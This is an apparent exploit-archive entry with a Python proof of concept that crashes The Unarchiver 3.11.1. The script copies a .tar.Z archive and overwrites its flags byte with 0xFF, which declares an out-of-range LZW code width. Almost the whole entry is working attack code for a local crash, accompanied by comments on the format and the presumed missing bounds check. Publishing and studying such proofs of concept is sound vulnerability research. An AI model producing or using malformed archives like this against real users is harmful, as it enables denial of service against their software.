
The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC

Posted on 30 November -0001

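# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
#
# What this script does: it copies an existing archive to
# "Local_Crash_PoC<extension>" in the current directory and overwrites the
# byte at offset 2 of the copy with 0xFF. The input file is never modified.
#
# Why that byte matters: in the compress(1) ".Z" format the two magic bytes
# are followed by a flags byte. In the referenced lzw.h the low five bits
# (BIT_MASK 0x1f) carry the maximum LZW code width and 0x80 is BLOCK_MODE;
# the reference implementation supports at most BITS = 16. 0xFF therefore
# announces a 31-bit code width with every flag bit set.
#
# NOTE(review): the page does not state the root cause inside The Unarchiver;
# presumably the declared code width is used without a range check. A decoder
# should reject a header whose width exceeds the supported maximum before any
# table is sized or indexed from it.

import os
import shutil
import struct
import sys
from mmap import mmap

if len(sys.argv) <= 1:
    print("Usage: python Local_Crash_PoC.py [file name]")
    sys.exit()

file_name = sys.argv[1]


def get_extension(file_name):
    """Return everything after the first dot of the base name, or None.

    "sample.tar.Z" gives ".tar.Z"; a name without a dot gives None.
    """
    basename = os.path.basename(file_name)
    extension = '.'.join(basename.split('.')[1:])
    return '.' + extension if extension else None


def file_maping():
    """Overwrite the byte at offset 2 of the open ``file_mod`` with 0xFF.

    Reads the module-level ``file_mod`` handle, which must be opened 'r+b'.
    Raises ValueError when the file is too short to contain that byte.
    """
    if os.fstat(file_mod.fileno()).st_size < 3:
        raise ValueError('input is shorter than 3 bytes; no flags byte to patch')
    maping = mmap(file_mod.fileno(), 0)
    try:
        # Slice assignment behaves the same on Python 2 and 3, unlike
        # write_byte(), whose argument type differs between the two.
        maping[2:3] = struct.pack('B', 255)
        maping.flush()
    finally:
        maping.close()


# A name without any extension previously made this concatenation fail with
# a TypeError (str + None); fall back to an empty suffix instead.
new_file_name = "Local_Crash_PoC" + (get_extension(file_name) or '')

# shutil.copyfile replaces os.popen('cp ' + ...): the file name no longer
# passes through a shell, and the copy has finished before the file is
# reopened (os.popen returned without waiting for cp to complete).
shutil.copyfile(file_name, new_file_name)

file_mod = open(new_file_name, 'r+b')
try:
    file_maping()
finally:
    file_mod.close()

print('[+] ' + 'Created file: ' + new_file_name)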

 
